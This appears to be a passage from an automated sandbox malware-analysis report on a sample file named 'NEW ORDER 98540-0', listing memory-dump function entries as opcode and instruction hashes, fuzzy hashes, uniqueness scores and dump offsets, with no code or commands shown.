                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 00756f9332e3b281f40ea8803e4bed82c9b4baffae49cb4aa3af2c10a13cf2a7
                                              • Instruction ID: ff047a858d0f523c5b86810c62ba3c25675d1e086a8a5f83f224074cefccb6dd
                                              • Opcode Fuzzy Hash: 00756f9332e3b281f40ea8803e4bed82c9b4baffae49cb4aa3af2c10a13cf2a7
                                              • Instruction Fuzzy Hash: B241EEB0D01349DFDB10DFA9C984A9EBBF5FF48310F248429E809AB254DB75A945CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b096afaa3ded038c25e85bbe6bbcc315f3cad7408a8484bf20d640e54f53485
                                              • Instruction ID: c4db49443a4de362e9582cd6805d76fc01aaa51285fd1814fab458a0778de7e2
                                              • Opcode Fuzzy Hash: 7b096afaa3ded038c25e85bbe6bbcc315f3cad7408a8484bf20d640e54f53485
                                              • Instruction Fuzzy Hash: 65316F38B02305CFDB58EB79D9106AD77F6AF8D240F1004A8C905AB394DF7A9C42CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8bb9fd681183cde93258dd01e87b27a1881ad625fb338e4c71d9cf9033df2dde
                                              • Instruction ID: 2f023bdacc03a88aff779d85de7af9cdd830cc081aac63c18e72ed5c3421c5c9
                                              • Opcode Fuzzy Hash: 8bb9fd681183cde93258dd01e87b27a1881ad625fb338e4c71d9cf9033df2dde
                                              • Instruction Fuzzy Hash: CC318F71E0120A9BDB45CFA5D8846AEF7F6FF89300F14C659E805EB350DB71A886CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08f083d6274195601ef8023963fc20c0f79368778d79e123943896a6a30eecc3
                                              • Instruction ID: a5e562c8e03d7a7d582837f660b4cdf2f21864db9d04816e7eeca086724b61c3
                                              • Opcode Fuzzy Hash: 08f083d6274195601ef8023963fc20c0f79368778d79e123943896a6a30eecc3
                                              • Instruction Fuzzy Hash: FF217130E1130A9BDB45CFA9D8846AEF7F6FF89300F54C659E805EB250DB709886CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73bf8e5a09b284884c1429033ac2e21f02466ba90dfecc84eac762c8d696fb37
                                              • Instruction ID: 6bd00d0f8a9518411cdfd517a87e14f29cdeb68aaa9627b8114812aca4e7b168
                                              • Opcode Fuzzy Hash: 73bf8e5a09b284884c1429033ac2e21f02466ba90dfecc84eac762c8d696fb37
                                              • Instruction Fuzzy Hash: 1A21C6706023058BDBFDD634E48936C3BE8E746310F1449A9F406CBA91DE689C85D756
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e81c7ed4d5db81b11189305c70b1d459b34480eabdf18cda10733477baec9417
                                              • Instruction ID: 382db38be78c338a33ca13a181d74a9a2d6526f708cccde1d0e394169bfbe5db
                                              • Opcode Fuzzy Hash: e81c7ed4d5db81b11189305c70b1d459b34480eabdf18cda10733477baec9417
                                              • Instruction Fuzzy Hash: A0219234E013099BCB18CFA4D844AAEF7F6AF89300F54866AEC15FB341DB70A845CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f5aabad9bd0882dc252722b5edca4abbbac73f15361ac8cb98eca51c8960c6c
                                              • Instruction ID: 4dd487de1b2d2d531b9ba4176b4d222420d70fd7559d652e23968d996a0a9a91
                                              • Opcode Fuzzy Hash: 5f5aabad9bd0882dc252722b5edca4abbbac73f15361ac8cb98eca51c8960c6c
                                              • Instruction Fuzzy Hash: 0821C5306012058BEFA8D735F88471A3BF9E785304F145A69E816CB271EE78EC818B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d2a615a9ed136c32fdc680dc9711fe94c0107e0cd54b996086dc3c5334e63d1
                                              • Instruction ID: 3c8219722544115c8e22e2d1293f3dac9ced306db6d8d9a9db1467fa6b66ec5d
                                              • Opcode Fuzzy Hash: 5d2a615a9ed136c32fdc680dc9711fe94c0107e0cd54b996086dc3c5334e63d1
                                              • Instruction Fuzzy Hash: E1213B34701205CFDB54DB79D958AADBBF5EF8D300B1144A8E806EB3A4DB769D01CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3339497354.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_158d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89490fa008ba2484d52c30063b0ed3cabce533bcd3dbbfedb540ba1b7c14db36
                                              • Instruction ID: 1c0bc13e670bdd799b992b3b2c11fa16e9aff3fa7d18b76790eed0a5cecae9d5
                                              • Opcode Fuzzy Hash: 89490fa008ba2484d52c30063b0ed3cabce533bcd3dbbfedb540ba1b7c14db36
                                              • Instruction Fuzzy Hash: BD210075604204EFDB15EF94D980B2ABBF1FB84314F20C96DD90A5F292D77AD407CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c826fef3845349fd3efeea7d004a5b55d469260c1281cb7cbedf36a750256574
                                              • Instruction ID: 112ae696e9a466a5b9ea0855288dbbdb8bcac2ea4cfc2697064c9cda14ddfc5b
                                              • Opcode Fuzzy Hash: c826fef3845349fd3efeea7d004a5b55d469260c1281cb7cbedf36a750256574
                                              • Instruction Fuzzy Hash: 3E216234E013199BCB18CFA4D8546AEF7F6AF89310F54865AEC15FB340DB70A945CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a766100a0e39c7302e22ff68bc2912012a0c85c5369dd58e4747be6b16669c06
                                              • Instruction ID: f20dc05404f5e07b75ccfa0a42b9058fd47294eec9fda1031df72401f3d7bd78
                                              • Opcode Fuzzy Hash: a766100a0e39c7302e22ff68bc2912012a0c85c5369dd58e4747be6b16669c06
                                              • Instruction Fuzzy Hash: AB214A34B01305CFDB98EB78D6147AEB7F6AF89201F1404A8C106EB294DF768D41CBA6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae7815fafe10f383c21620af9f8ccc835a658125258d7d19531a784341f23a02
                                              • Instruction ID: 34d20260a0005f88792fb95381383b956ce9ee2b3fdf4eb711003fc8095a794b
                                              • Opcode Fuzzy Hash: ae7815fafe10f383c21620af9f8ccc835a658125258d7d19531a784341f23a02
                                              • Instruction Fuzzy Hash: C421C6306112058BEF98D735F88471A3BE9E7C5314F145A69E416CB261DF78EC858BD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f3196dbc7c2205f7ba3e2583cc56377bf87055a1ae4b806ce5ac018f45b96b9
                                              • Instruction ID: 82ba117388cdaac9d5e05c3f2c12ae6b1d52f71bf3f663bcc535af4ba33b23fc
                                              • Opcode Fuzzy Hash: 1f3196dbc7c2205f7ba3e2583cc56377bf87055a1ae4b806ce5ac018f45b96b9
                                              • Instruction Fuzzy Hash: 3E213934701204CFDB54EB79DA58AAD7BF6EF8D200F1104A8E906EB3A4DB769D01CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e1a35001f5091a124d2a259f25d82e30a5f7e3e09de5684ea1ba7f19fd60231
                                              • Instruction ID: e065aa07ca137071f6bfda10da82aba30f1fcd991b72897fc0e4c27b53bb07ca
                                              • Opcode Fuzzy Hash: 7e1a35001f5091a124d2a259f25d82e30a5f7e3e09de5684ea1ba7f19fd60231
                                              • Instruction Fuzzy Hash: 12110A31B0230E8BDFA5D675D40436D7BE5FB81210F2888B9D48ECF251DA65DC854BD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3339497354.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_158d000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bdbfc42a4ee6c8b50b587128f81bd4142ac5aab6b615efa77a5ed4352f1cf0d
                                              • Instruction ID: 8b054da541eb8f98149469a9dca0041877d336fd85b2fd9f9ff7f572a08587fc
                                              • Opcode Fuzzy Hash: 3bdbfc42a4ee6c8b50b587128f81bd4142ac5aab6b615efa77a5ed4352f1cf0d
                                              • Instruction Fuzzy Hash: BE217C75509384CFDB02DF64D990715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e18365bd821f725bb3c2c101f9324011f796a2079117a9d02cad628600c53d94
                                              • Instruction ID: 5ab79206486ded0ecbf89c75e6e1c0c38444c880f87d4815994646dcfdc321dd
                                              • Opcode Fuzzy Hash: e18365bd821f725bb3c2c101f9324011f796a2079117a9d02cad628600c53d94
                                              • Instruction Fuzzy Hash: BC110630B0230E8BEF94DB7AD40476E76D9FB81210F2488B8E14ACF255DE65DC818BD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf9ff961df58d58f945dcf6d747d3231a2021a66884f7e07b39d78c52d2538e2
                                              • Instruction ID: b9708a3933127f90a109b4d1ab947074f1694579e54dcf3b7f09641eaa4dde23
                                              • Opcode Fuzzy Hash: bf9ff961df58d58f945dcf6d747d3231a2021a66884f7e07b39d78c52d2538e2
                                              • Instruction Fuzzy Hash: B71102B6F01355ABDB80DF75E80865E7FF9EB48660F140475E906D3300EA34C8419782
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f3f8d89506fbcd2aaa7c0cdc8e9d44a2bbdaf472e22dd9e00b06563f5f487dd
                                              • Instruction ID: f6118cb8924df03751cf68248165276359fc83758963eaa8934efb3f6a9c5549
                                              • Opcode Fuzzy Hash: 1f3f8d89506fbcd2aaa7c0cdc8e9d44a2bbdaf472e22dd9e00b06563f5f487dd
                                              • Instruction Fuzzy Hash: 91115235A023159BCF95EFB894502AD7AF6EB48210B28047AD406EB341EB35D941CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53d273679b204ab29490a2a16cdd9ef34140f9de6537182042ac71ae19814dca
                                              • Instruction ID: b64fde1c3ecb279c9b8a21d6ed7099de8328365d3caf5185377d36a4c830bf9d
                                              • Opcode Fuzzy Hash: 53d273679b204ab29490a2a16cdd9ef34140f9de6537182042ac71ae19814dca
                                              • Instruction Fuzzy Hash: 14014435A023159BCB95EFB8945029E77F6EF48210F240479D405EF300EB35D941CBD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d1aba56afde15b190afb0ba62beac6b08e19f7de91110fe5c6bbea3fd122993
                                              • Instruction ID: b41e89fae407f704c895f0da4f6cbbeddf6ea52d66e1aa1c80daf5a915b79c78
                                              • Opcode Fuzzy Hash: 1d1aba56afde15b190afb0ba62beac6b08e19f7de91110fe5c6bbea3fd122993
                                              • Instruction Fuzzy Hash: 3801D83090028ADFDB46EBB8F84458D7FF1EBC1300F5442ACC504AB1A1EE752D46D791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82f87792189794e0827418de9470df80f009b00fca879b15618397da0cd1fdfd
                                              • Instruction ID: 7a8548736a4727a1f901ddf00738f7f2f53836214374bf17f69bf28e2618b65e
                                              • Opcode Fuzzy Hash: 82f87792189794e0827418de9470df80f009b00fca879b15618397da0cd1fdfd
                                              • Instruction Fuzzy Hash: 66F0F637A06310DFCB56CBE494902ACBBF1EE9812171940D7D806DF715DB29D442C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e5e244a05935d566cf9bafe30530a51072cc94ba2c10eb9ca06fda6a7435549
                                              • Instruction ID: 59df6d1e6cbd32c8637db69a3aa45e9c03cfd9b1c1ba92845320de65fb5272a3
                                              • Opcode Fuzzy Hash: 3e5e244a05935d566cf9bafe30530a51072cc94ba2c10eb9ca06fda6a7435549
                                              • Instruction Fuzzy Hash: B1F01435B01208CFC714DB74E5A8A6C7BB2EF88215F5040A8E5068B3A0DF31AD42CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a878cfc1f39dc1451e83c2a7d393e889b3a4a2e170bc0b976eeca18104758ce5
                                              • Instruction ID: 87b127a4f05d3bc9e68a2e78459723034e871adb6d53367aa967cf9dad5cbf02
                                              • Opcode Fuzzy Hash: a878cfc1f39dc1451e83c2a7d393e889b3a4a2e170bc0b976eeca18104758ce5
                                              • Instruction Fuzzy Hash: 84F04F7090014EDFDB45EBA8F88159D7BB5FBC0300F50926CCA05AB260EE752E869B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3340876863.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_30d0000_NEW ORDER 98540-0.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb16ac1389b90c2ac26e5d924bc6fde06b017dfc315346ac788fcc8c1e681023
                                              • Instruction ID: 028d8552d12e23801c99cd1177e91aee1798e8dca6c4bd319cb904983059abfa
                                              • Opcode Fuzzy Hash: bb16ac1389b90c2ac26e5d924bc6fde06b017dfc315346ac788fcc8c1e681023
                                              • Instruction Fuzzy Hash: FCF0E572789690CFC705DB3CE4C80D6BFE6EB8512630801DFC0898B142CA2288468780
                                              Uniqueness

                                              Uniqueness Score: -1.00%